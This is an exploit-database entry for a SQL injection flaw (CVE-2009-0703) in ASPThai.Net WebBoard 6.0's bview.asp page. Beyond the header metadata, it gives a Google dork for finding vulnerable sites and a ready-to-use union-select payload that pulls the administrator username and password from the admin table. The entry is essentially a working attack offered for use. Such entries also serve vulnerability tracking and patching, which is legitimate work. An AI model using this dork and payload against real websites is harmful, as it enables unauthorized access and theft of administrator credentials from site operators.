ASPThai.Net WebBoard 6.0 - SQL Injection

Author: DaiMon
type: webapps
platform: php
port: 
date_added: 2008-12-31 
date_updated: 2017-01-11 
verified: 1 
codes: OSVDB-52261;CVE-2009-0703 
tags: 
aliases:  
screenshot_url:  
application_url: 

ASPThai.Net Webboard 6.0(bview.asp) SQL Injection Vulnerability
#############################################
>>Autore: DaiMon
>>Email: cwdaimon[1]gmail.com
>>Site: http://www.cwdaimon.com
>>Version: 6.0
>>Download: http://www.aspthai.net/detailcode.asp?Mode=Load&DID=7&Redirect=QUHG/UKCD/RREP/VZssGGYUkedWebLtksjudROM
##############################################
>>>>
Bug In \bview.asp
>>>>
Google Dork:
allinurl:bview.asp?id=
>>>>
Exploit:

bview.asp?id=1+union+select+0,useradmin,2,3,4,passadmin,6,7,8+from+admin
##############################################
Special:PARS! & Equilibrium & KaYZeRSoZe & ALL Cyber-Warrior

# milw0rm.com [2009-01-01]